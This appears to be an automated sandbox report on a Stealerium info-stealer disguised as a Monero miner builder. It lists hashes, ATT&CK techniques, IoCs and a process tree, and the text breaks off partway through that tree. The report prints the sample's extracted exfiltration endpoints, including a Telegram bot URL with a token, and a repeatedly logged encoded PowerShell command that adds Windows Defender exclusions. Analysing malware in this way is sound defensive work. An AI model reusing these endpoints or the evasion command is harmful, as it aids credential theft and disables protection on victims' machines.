stealerium | 33192e2c62761c054586d32d3a36a37f02dc6294e0326abd252e819efeb736bc

Analysis

max time kernel
73s
max time network
75s
platform
windows10-2004_x64
resource
win10v2004-20250129-en
resource tags

arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system
submitted
03-02-2025 18:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Silent XMR Miner Builder.exe
Size

44.7MB
MD5

9706c540dd26ade6bf85b4bbcb9f483a
SHA1

f088af13fa12f99e41f748939dfeaece88546480
SHA256

33192e2c62761c054586d32d3a36a37f02dc6294e0326abd252e819efeb736bc
SHA512

83b4abc06b99f6fd4ec15974273e8e8490819c9feff061232e147214c8a786995e14368e1ded1ca9268a6776a6b8e6acb4454f3b0d20834c11e4d36d95d470b8
SSDEEP

786432:VO8Zj0154/RAKyX4oW4SrV6cfvmKaEYxfmTTHQc7p+guPGMB78NWGm0aLMtxx790:NZwOZYX4b4SrtfeKhY9p6EvGMB78oGm4

Score

10^/10

stealerium credential_access defense_evasion discovery stealer

Malware Config

Extracted

Family

stealerium

https://api.telegram.org/bot7665465643:AAHovJK8wV9ZYD10sdy6ONMxUF7l77R6hlE/sendMessage?chat_id=

Attributes

email
[email protected]
url
https://szurubooru.zulipchat.com/api/v1/messages

Signatures

Stealerium
An open source info stealer written in C# first seen in May 2022.
stealer stealerium
Stealerium family
stealerium

Uses browser remote debugging 2 TTPs 5 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
2140	chrome.exe
6028	chrome.exe
5632	chrome.exe
6264	chrome.exe
7360	msedge.exe

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000\Control Panel\International\Geo\Nation	Silent XMR Miner Builder.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000\Control Panel\International\Geo\Nation	Silent XMR Miner Builder.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000\Control Panel\International\Geo\Nation	Silent XMR Miner Builder.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000\Control Panel\International\Geo\Nation	Silent XMR Miner Builder.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000\Control Panel\International\Geo\Nation	Silent XMR Miner Builder.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000\Control Panel\International\Geo\Nation	Silent XMR Miner Builder.exe

Executes dropped EXE 6 IoCs

pid	Process
1568	build.exe
2248	build.exe
2920	build.exe
4188	build.exe
4816	build.exe
4428	build.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 52 IoCs

Web Service

T1102

flow	ioc
21	raw.githubusercontent.com
24	raw.githubusercontent.com
38	raw.githubusercontent.com
43	raw.githubusercontent.com
45	raw.githubusercontent.com
68	raw.githubusercontent.com
11	raw.githubusercontent.com
14	raw.githubusercontent.com
82	raw.githubusercontent.com
99	raw.githubusercontent.com
87	raw.githubusercontent.com
96	raw.githubusercontent.com
73	raw.githubusercontent.com
86	raw.githubusercontent.com
63	raw.githubusercontent.com
70	raw.githubusercontent.com
79	raw.githubusercontent.com
20	raw.githubusercontent.com
53	raw.githubusercontent.com
75	raw.githubusercontent.com
84	raw.githubusercontent.com
44	raw.githubusercontent.com
46	raw.githubusercontent.com
47	raw.githubusercontent.com
65	raw.githubusercontent.com
71	raw.githubusercontent.com
98	raw.githubusercontent.com
100	raw.githubusercontent.com
23	raw.githubusercontent.com
42	raw.githubusercontent.com
81	raw.githubusercontent.com
93	raw.githubusercontent.com
22	raw.githubusercontent.com
72	raw.githubusercontent.com
62	raw.githubusercontent.com
74	raw.githubusercontent.com
77	raw.githubusercontent.com
78	raw.githubusercontent.com
80	raw.githubusercontent.com
90	raw.githubusercontent.com
10	raw.githubusercontent.com
13	raw.githubusercontent.com
56	raw.githubusercontent.com
76	raw.githubusercontent.com
83	raw.githubusercontent.com
85	raw.githubusercontent.com
92	raw.githubusercontent.com
94	raw.githubusercontent.com
15	raw.githubusercontent.com
16	raw.githubusercontent.com
95	raw.githubusercontent.com
97	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
48	icanhazip.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 13 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Silent XMR Miner Builder.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Silent XMR Miner Builder.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Silent XMR Miner Builder.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Silent XMR Miner Builder.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Silent XMR Miner Builder.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Silent XMR Miner Builder.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Silent XMR Miner Builder.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
5864	netsh.exe
6020	cmd.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
4676	powershell.exe
4676	powershell.exe
4004	powershell.exe
4004	powershell.exe
464	powershell.exe
2836	powershell.exe
2836	powershell.exe
464	powershell.exe
464	powershell.exe

Suspicious use of AdjustPrivilegeToken 11 IoCs

description	pid	Process
Token: SeDebugPrivilege	1568	build.exe
Token: SeDebugPrivilege	4676	powershell.exe
Token: SeDebugPrivilege	4004	powershell.exe
Token: SeDebugPrivilege	2248	build.exe
Token: SeDebugPrivilege	2920	build.exe
Token: SeDebugPrivilege	464	powershell.exe
Token: SeDebugPrivilege	4188	build.exe
Token: SeDebugPrivilege	2836	powershell.exe
Token: SeDebugPrivilege	4816	build.exe
Token: SeDebugPrivilege	448	powershell.exe
Token: SeDebugPrivilege	4428	build.exe

Suspicious use of WriteProcessMemory 48 IoCs

description	pid	Process	procid_target
PID 4516 wrote to memory of 4676	4516	Silent XMR Miner Builder.exe	87
PID 4516 wrote to memory of 4676	4516	Silent XMR Miner Builder.exe	87
PID 4516 wrote to memory of 4676	4516	Silent XMR Miner Builder.exe	87
PID 4516 wrote to memory of 2960	4516	Silent XMR Miner Builder.exe	89
PID 4516 wrote to memory of 2960	4516	Silent XMR Miner Builder.exe	89
PID 4516 wrote to memory of 2960	4516	Silent XMR Miner Builder.exe	89
PID 4516 wrote to memory of 1568	4516	Silent XMR Miner Builder.exe	90
PID 4516 wrote to memory of 1568	4516	Silent XMR Miner Builder.exe	90
PID 2960 wrote to memory of 4004	2960	Silent XMR Miner Builder.exe	91
PID 2960 wrote to memory of 4004	2960	Silent XMR Miner Builder.exe	91
PID 2960 wrote to memory of 4004	2960	Silent XMR Miner Builder.exe	91
PID 2960 wrote to memory of 2400	2960	Silent XMR Miner Builder.exe	134
PID 2960 wrote to memory of 2400	2960	Silent XMR Miner Builder.exe	134
PID 2960 wrote to memory of 2400	2960	Silent XMR Miner Builder.exe	134
PID 2960 wrote to memory of 2248	2960	Silent XMR Miner Builder.exe	95
PID 2960 wrote to memory of 2248	2960	Silent XMR Miner Builder.exe	95
PID 2400 wrote to memory of 464	2400	Silent XMR Miner Builder.exe	96
PID 2400 wrote to memory of 464	2400	Silent XMR Miner Builder.exe	96
PID 2400 wrote to memory of 464	2400	Silent XMR Miner Builder.exe	96
PID 2400 wrote to memory of 2604	2400	Silent XMR Miner Builder.exe	98
PID 2400 wrote to memory of 2604	2400	Silent XMR Miner Builder.exe	98
PID 2400 wrote to memory of 2604	2400	Silent XMR Miner Builder.exe	98
PID 2400 wrote to memory of 2920	2400	Silent XMR Miner Builder.exe	99
PID 2400 wrote to memory of 2920	2400	Silent XMR Miner Builder.exe	99
PID 2604 wrote to memory of 2836	2604	Silent XMR Miner Builder.exe	100
PID 2604 wrote to memory of 2836	2604	Silent XMR Miner Builder.exe	100
PID 2604 wrote to memory of 2836	2604	Silent XMR Miner Builder.exe	100
PID 2604 wrote to memory of 3156	2604	Silent XMR Miner Builder.exe	117
PID 2604 wrote to memory of 3156	2604	Silent XMR Miner Builder.exe	117
PID 2604 wrote to memory of 3156	2604	Silent XMR Miner Builder.exe	117
PID 2604 wrote to memory of 4188	2604	Silent XMR Miner Builder.exe	103
PID 2604 wrote to memory of 4188	2604	Silent XMR Miner Builder.exe	103
PID 3156 wrote to memory of 448	3156	Silent XMR Miner Builder.exe	104
PID 3156 wrote to memory of 448	3156	Silent XMR Miner Builder.exe	104
PID 3156 wrote to memory of 448	3156	Silent XMR Miner Builder.exe	104
PID 3156 wrote to memory of 5084	3156	Silent XMR Miner Builder.exe	106
PID 3156 wrote to memory of 5084	3156	Silent XMR Miner Builder.exe	106
PID 3156 wrote to memory of 5084	3156	Silent XMR Miner Builder.exe	106
PID 3156 wrote to memory of 4816	3156	Silent XMR Miner Builder.exe	132
PID 3156 wrote to memory of 4816	3156	Silent XMR Miner Builder.exe	132
PID 5084 wrote to memory of 2356	5084	Silent XMR Miner Builder.exe	347
PID 5084 wrote to memory of 2356	5084	Silent XMR Miner Builder.exe	347
PID 5084 wrote to memory of 2356	5084	Silent XMR Miner Builder.exe	347
PID 5084 wrote to memory of 5108	5084	Silent XMR Miner Builder.exe	110
PID 5084 wrote to memory of 5108	5084	Silent XMR Miner Builder.exe	110
PID 5084 wrote to memory of 5108	5084	Silent XMR Miner Builder.exe	110
PID 5084 wrote to memory of 4428	5084	Silent XMR Miner Builder.exe	293
PID 5084 wrote to memory of 4428	5084	Silent XMR Miner Builder.exe	293

C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
"C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4516
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4676
- C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
  "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2960
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4004
- - C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
    "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2400
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:464
  - - C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
      "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2604
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2836
    - - C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        5⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3156
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:448
      - C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        6⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:5084
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2356
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:5108
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        8⤵
        
        PID:4100
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        8⤵
        
        PID:3532
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        9⤵
        
        PID:4208
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        
        PID:3156
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        9⤵
        
        PID:1040
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        10⤵
        
        PID:3648
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        10⤵
        
        PID:4872
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        11⤵
        
        PID:2236
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        11⤵
        
        PID:1380
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        12⤵
        
        PID:1452
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        12⤵
        
        PID:3876
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        13⤵
        
        PID:2376
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        14⤵
        
        PID:4816
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        13⤵
        
        PID:2224
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        14⤵
        
        PID:2280
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        14⤵
        
        PID:1380
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        15⤵
        
        PID:5312
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        15⤵
        
        PID:5420
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        16⤵
        
        PID:5624
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        16⤵
        
        PID:5744
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        17⤵
        
        PID:5176
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        17⤵
        
        PID:5540
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        18⤵
        
        PID:3720
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        18⤵
        
        PID:4680
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZgB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAdgBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAaQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAaQBuACMAPgA="
        19⤵
        
        PID:6424
        
        C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Silent XMR Miner Builder.exe"
        19⤵
        
        PID:6496
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
